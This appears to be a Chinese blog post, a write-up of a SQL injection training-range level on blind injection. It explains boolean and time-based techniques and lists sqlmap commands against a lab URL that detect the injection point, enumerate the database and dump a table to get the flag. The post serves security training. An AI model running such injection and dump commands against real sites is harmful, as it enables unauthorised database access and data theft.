美文网首页
SQL注入靶场—盲注Rank1-2

SQL注入靶场—盲注Rank1-2

作者: N8_xEnn7nA1 | 来源:发表于2018-11-13 14:15 被阅读0次

当存在注入点,但服务器没有返回sql执行后的结果回显,就可以使用盲注,盲注分为布尔注入和时间注入。

布尔注入涉及的函数有:
(1) length() 返回字符串长度
(2) substr() 截取字符串
(3) ascii() 返回字符的ascii 码

时间注入涉及的函数有:
(1) sleep(n) 将程序挂起n秒
(2) if (expr1, expr2, expr3):判断语句,如果expr1为真则执行expr2,否则执行expr3

盲注其实就是通过多次的注入测试来得到结果,所以如果是手工测的话,是很耗时的,这种情况一般都会选择使用sqlmap这样的自动化注入工具。

---------------------- Rank 1 -----------------------------------------------------

(1)判断是否存在注入点:

sqlmap -u "http://120.203.13.75:8150/New/BlindBased/RankOne/sql-one/?id=1"

得到数据库的信息:

image.png

(2)获取当前数据库名:

sqlmap -u "http://120.203.13.75:8150/New/BlindBased/RankOne/sql-one/?id=1" --current-db

image.png

(3)获取当前数据库下的表名:

sqlmap -u "http://120.203.13.75:8150/New/BlindBased/RankOne/sql-one/?id=1" --tables -D "security"

image.png

(4)获取zkaq表的字段名:

sqlmap -u "http://120.203.13.75:8150/New/BlindBased/RankOne/sql-one/?id=1" --columns -T "zkaq" -D "security"

image.png

(5)获取zkaq表中的内容,即可得到flag:

sqlmap -u "http://120.203.13.75:8150/New/BlindBased/RankOne/sql-one/?id=1" --dump -C "flag,zKaQ" -T "zkaq" -D "security"

-------------------------- Rank 2 ---------------------------------------------

步骤同上一题,这里就不说了。

相关文章

  • SQL注入靶场—盲注Rank1-2

    当存在注入点,但服务器没有返回sql执行后的结果回显,就可以使用盲注,盲注分为布尔注入和时间注入。 布尔注入涉及的...

  • 一步一步学习 Web 安全 2.4 union 联合查询注入

    对 SQL 注入有一个大致的了解后,我们再来深入学习。 SQL 注入有联合查询注入、报错注入、布尔盲注、时间盲注等...

  • 2019-02-24 sql注入

    sql注入主要分为显注和盲注,显注就是你注入的sql语句可以显示的显示到界面上,告诉你的语句对还是错。盲注就是不会...

  • sql注入之盲注

    所谓的盲注即是在sql注入后在前端没有出现报错信息,无法判断是否注入成功。所以需要盲注进行判断 盲注分为基于布尔型...

  • sql注入-盲注

    注入源代码 1.left()判断数据库版本

  • SQL注入之布尔盲注

    title: SQL注入之布尔盲注date: 2019-05-25 14:05:48tags:- SQL注入- 布...

  • sqli-lab之第二章--盲注

    第二章 盲注 注意: 本文大部分内容都是参考mysql注入天书 学习篇 何为盲注?盲注就是在 sql 注入过程中,...

  • 【SQL注入】如何提高盲注的效率

    0x01 SQL注入之盲注 提到SQL注入,我想懂安全的小伙伴们应该都知道的,那么今天就来聊一聊关于如何提高盲注效...

  • 盲注好帮手 BurpSuite

    环境 windows 10 DVWA靶场,等级 low,Get型 / 单引号盲注 如果不巧碰到的存在注入的站点,只...

  • sql盲注学习笔记

    sql盲注 在刚接触sql注入的时候还不太清楚sql盲注是什么,很多东西都要自己去体会才能知道到底是什么样子的。 ...

网友评论

      本文标题:SQL注入靶场—盲注Rank1-2

      本文链接:https://www.haomeiwen.com/subject/tatlfqtx.html